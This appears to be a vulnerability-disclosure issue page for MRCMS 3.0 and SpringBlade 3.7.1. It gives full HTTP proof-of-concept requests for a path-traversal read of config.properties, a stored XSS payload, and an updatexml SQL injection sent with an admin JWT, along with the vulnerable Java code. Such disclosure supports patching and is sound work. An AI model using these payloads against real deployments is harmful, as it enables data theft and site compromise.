cve's People
cve's Issues
MRCMS 3.0 Arbitrary file reading vulnerability exists /admin/file/edit.do
Build the source code locally by downloading https://gitee.com/marker/MRCMS
The vulnerability exists: http://127.0.0.1:8080/admin/index.do
Click Content Management-->File Management
Click the Edit File button 1.txt
Read the config.properties
file in the resources
directory by using ../
poc
GET /admin/file/edit.do?path=../resources/config.properties&name= HTTP/1.1
Host: 127.0.0.1:8080
Referer: http://127.0.0.1:8080/admin/index.do
Sec-Fetch-Dest: empty
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Sec-Fetch-Mode: cors
X-Requested-With: XMLHttpRequest
Read the contents of the config.properties
file
code discovery
Code path: MRCMS\src\main\java\org\marker\mushroom\controller\FileController.java
Pass in the path
and name
variables in the code, obtain the file path through the File
class, and finally use FileTools.getFileContet()
to read the content of the obtained file.
@RequestMapping("/edit")
public ModelAndView edit(@RequestParam("path") String path, @RequestParam("name") String name){
ModelAndView view = new ModelAndView(this.viewPath + "edit");
File file = new File(WebRealPathHolder.REAL_PATH + encoding(path + File.separator + name));
try {
view.addObject("data", FileTools.getFileContet(file, FileTools.FILE_CHARACTER_UTF8));
} catch (IOException e) {
e.printStackTrace();
}
view.addObject("path", encoding(path));
view.addObject("name", encoding(name));
return view;
}
Code path: MRCMS\src\main\java\org\marker\mushroom\utils\FileTools.java
getFileContet
method call getContent
public static final String getFileContet(File filePath,String character) throws IOException{
return FileTools.getContent(filePath, character);
}
Code path: MRCMS\src\main\java\org\marker\mushroom\utils\FileTools.java
getContent
Read file contents
private static String getContent(File filePath, String character) throws IOException{
FileInputStream __fis = new FileInputStream(filePath);//文件字节流
return getStreamContent(__fis, character);//返回文件内容
}
MRCMS 3.0 There is an xss cross-site scripting vulnerability /admin/system/saveinfo.do
Build the source code locally by downloading https://gitee.com/marker/MRCMS
The vulnerability exists: http://127.0.0.1:8080/admin/index.do
Insert xss cross-site scripting attack code
"><img src=1 onerror=alert(/xss/)>
POC:
POST /admin/system/saveinfo.do HTTP/1.1
Host: 127.0.0.1:8080
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1:8080/admin/index.do
Origin: http://127.0.0.1:8080
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Sec-Fetch-Mode: cors
Accept: application/json, text/javascript, */*; q=0.01
Content-Length: 844
config.title=蘑菇建站系统&config.url=http://cms.yl-blog.com/&config.keywords=蘑菇建站系统&config.description=蘑菇建站系统"><img src=1 onerror=alert(/xss/)>&[email protected]&config.mobile=&config.qq=&config.copyright=版权所有©蘑菇建站系统&config.icp=蜀ICP备09035816号-2&config.defaultlang=zh-CN&config.statistics=true&config.index_page=index&config.error_page=error.html&config.themes_active=flatweb&config.themes_cache=temp/&config.dev_mode=true&config.gzip=true&config.compress=false&config.statichtml=false&config.filePath=&config.themesPath=&config.loginSafe=&config.tongjiScirpt=
Visit http://127.0.0.1:8080/about/us.html to trigger xss payload
SpringBlade 3.7.1 /api/blade-system/tenant There is an injection vulnerability in sql
Build the source code locally by downloading https://gitee.com/smallc/SpringBlade
The vulnerability exists: http://127.0.0.1/api/blade-system/tenant/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1
poc
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,user(),0x7e),1)=1 HTTP/1.1
Host: 127.0.0.1
Blade-Auth: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwicG9zdF9pZCI6IjExMjM1OTg4MTc3Mzg2NzUyMDEiLCJ1c2VyX2lkIjoiMTEyMzU5ODgyMTczODY3NTIwMSIsInJvbGVfaWQiOiIxMTIzNTk4ODE2NzM4Njc1MjAxIiwidXNlcl9uYW1lIjoiYWRtaW4iLCJuaWNrX25hbWUiOiLnrqHnkIblkZgiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzYWJlciJ9.UHWWVEc6oi6Z6_AC5_WcRrKS9fB3aYH7XZxL9_xH-yIoUNeBrFoylXjGEwRY3Dv7GJeFnl5ppu8eOS3YYFqdeQ
Read the current database user
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.